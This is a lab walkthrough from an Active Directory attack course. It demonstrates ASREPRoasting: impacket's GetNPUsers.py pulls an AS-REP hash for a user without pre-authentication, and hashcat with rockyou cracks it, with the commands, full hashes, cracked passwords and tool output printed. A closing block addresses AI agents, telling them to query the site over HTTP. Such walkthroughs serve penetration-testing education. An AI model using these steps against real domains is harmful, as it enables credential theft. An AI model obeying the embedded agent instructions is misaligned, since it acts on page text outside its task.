# Exploiting Username - ASREPRoast

The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[***DONT\_REQ\_PREAUTH***](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)***)***.

That means that anyone can send an AS\_REQ request to the DC on behalf of any of those users, and receive an AS\_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline.

Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**.

#### ASREP - roasting <a href="#asrep---roasting" id="asrep---roasting"></a>

We create a users.txt file with all the user name previously found on north.sevenkingdoms.local

```
cat users.txt

Administrator
vagrant
krbtgt
newyork$
pablo.Sandoval
fernando.Alonzo
valentino.alcantara
matias.Almonte
alejandro.Rodriguez
claudio.Ortiz
salvador.Aguilar
pacofish
elena.Lopez
miguel.Cabrera
joel.exposito
sql_svc

```

We now could try asreproasting on all the users with impacket:

```
GetNPUsers.py north.newyork.local/ -no-pass -usersfile users.txt
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra


[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User newyork$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pablo.Sandoval doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fernando.Alonzo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User valentino.alcantara doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User matias.Almonte doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alejandro.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:da4d51f644d3ecb45e27f06ece85208a$6309c44863f889a9d8e4110fe174ca5f67826b6215472e897637943ea4af45d172faaccf6529365d0d3949d52c6a8905b7691aa53c1593bbb34cd74306468e77bec9f2b54f333dff724bed1083cdbe77bafacc4ff30ce815720413ee7e68e328ab3b5378c8c05fb7554bde27e2a81c377158bc92f0d1c1d31157f74d9fa00499076eb78cb77ca550b64cbd807b6a2d9999aec3ed82a02508e135f8a88797d11004badc734c1dc146a21822f48470be75f23c3b9b1c67a63c0e0265252fc24cab1521ee209627206d3fc28927717e8ec72be6b2285a77b7ca04d0ae74c2ce37aa194f762d32c70687a4f6074223e39a77b7af0616eb7acae8b040
[-] User salvador.Aguilar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pacofish doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User elena.Lopez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User miguel.Cabrera doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User joel.exposito doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set



```

* We get a ticket for claudio.ortiz and we will try to break it the user don’t require kerberos pre-authentication.
* This needs to be done on your local machine

<pre><code>
#move rockyou.txt.gz to your current directory
sudo mv /usr/share/wordlists/rockyou.txt.gz .

#unzip rockyou.txt.gz
gzip -d rockyou.txt.gz

<strong>#let's start cracking
</strong>hashcat -m 18200 '$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306' -a 3 rockyou.txt

-m = is the mode (18200 | Kerberos 5, etype 23, AS-REP)
-a = --attack-mode = (0 | Straight, 1 | Combination, 3 | Brute-force ,6 | Hybrid Wordlist + Mask, 7 | Hybrid Mask + Wordlist)




$krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e75978f6243551a3faf9c5632763627$f07b53f1af9ef89392c6097c8c60e95a400040b4ec23c986fc96d4b0dca59978cd5d2c917667a2ff6f0acb292df72360ba334a8153bd686b29245af993a268927a3b8b2317933802ff9360ddb86b503de8ee7f0917302c699f1e3819c7ffe65d989dc1e0925cc5baf62cbc083920f043a18bbb2a397fc72cfc9944e7d0167040588ce708aedca46d1e66d0b398e647c3158e8c69b5e8fa19a23ff1c7f4517a6f6210ceb5e2eccc6f520180303daaaa2dbeaf1e16c55cca50ea3db870b521cc8c14a51f3c6fc4f31766c6aa328c596380f417d82d78c31047e20ed6a29cdc6d34dafd8d83cf57582e5b4a3a04a14c4490f55be11c239f8c121306:babyboy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$claudio.Ortiz@NORTH.NEWYORK.LOCAL:8e7...121306
Time.Started.....: Wed Feb 22 08:32:49 2023 (0 secs)
Time.Estimated...: Wed Feb 22 08:32:49 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: babyboy [7]
Guess.Queue......: 286/14336793 (0.00%)
Speed.#1.........:    10958 H/s (0.01ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: babyboy -> babyboy
Hardware.Mon.#1..: Util: 46%

Started: Wed Feb 22 08:32:23 2023
Stopped: Wed Feb 22 08:32:50 2023



</code></pre>

We now have two couple of credentials

```
miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/user-enumeration-exploit/exploiting-username-asreproast.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.